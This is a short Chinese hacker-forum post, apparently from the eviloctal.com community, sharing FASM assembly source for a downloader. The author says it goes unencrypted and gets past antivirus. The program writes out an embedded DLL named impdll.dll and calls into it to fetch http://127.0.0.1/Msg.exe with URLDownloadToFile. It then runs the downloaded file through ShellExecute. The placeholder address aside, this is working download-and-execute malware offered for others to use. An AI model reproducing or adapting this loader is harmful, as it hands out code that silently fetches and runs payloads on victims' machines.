文章作者:洋洒
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
停电停得心情郁闷,没车没得心情郁闷,无聊ing。
内容
如题.不加密.过卡吧.还有别的,自己看去.
.会释放一个impdll.dll然后下载127.0.0.1/Msg.exe并运行
很简单的方法[所以不说了.自己看下文件就知道了].只是没见什么人用过罢了,又无聊,所以贴出来.喜欢的人玩玩..
下面是Exe的代码.
复制内容到剪贴板
代码:
format PE Gui at $52330000
include '%include%\win32ax.inc'
section '.4s' code readable executable writeable
entry $
mov ebx,$52330000
callw FindResource,ebx,impdll,RT_RCDATA
add bx,word[eax]
mov ebp,dword[eax+4]
callw CreateFile,szPath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,NULL
callw WriteFile,eax,ebx,ebp,esp,esp,eax,eax
pop eax
callw CloseHandle
xor ebx,ebx
push ebx ebx szLocFile szNetFile NULL
callw LoadLibrary,szPath
add eax,$1060
call eax
callw ShellExecute,ebx,ebx,szLocFile,ebx,ebx,SW_SHOW
callw ExitProcess,ebx
;---------------------------------------data---------------------------------------
szPath db '.\impdll.dll',0
szNetFile db 'http://127.0.0.1/Msg.exe',0
szLocFile db 'Msg.exe',0
data resource
_file 5001,impdll,'1.dll'
end datadll的代码很简单就一个
复制内容到剪贴板
代码:
jmp dword [UrlDownloadtofile]都打包在附件里了